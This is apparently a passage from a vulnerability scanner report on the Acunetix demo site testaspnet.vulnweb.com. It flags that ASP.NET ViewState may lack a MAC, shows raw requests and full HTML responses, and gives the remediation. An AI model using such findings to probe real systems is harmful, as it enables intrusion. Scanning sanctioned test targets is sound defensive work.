href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        8. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        9. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjd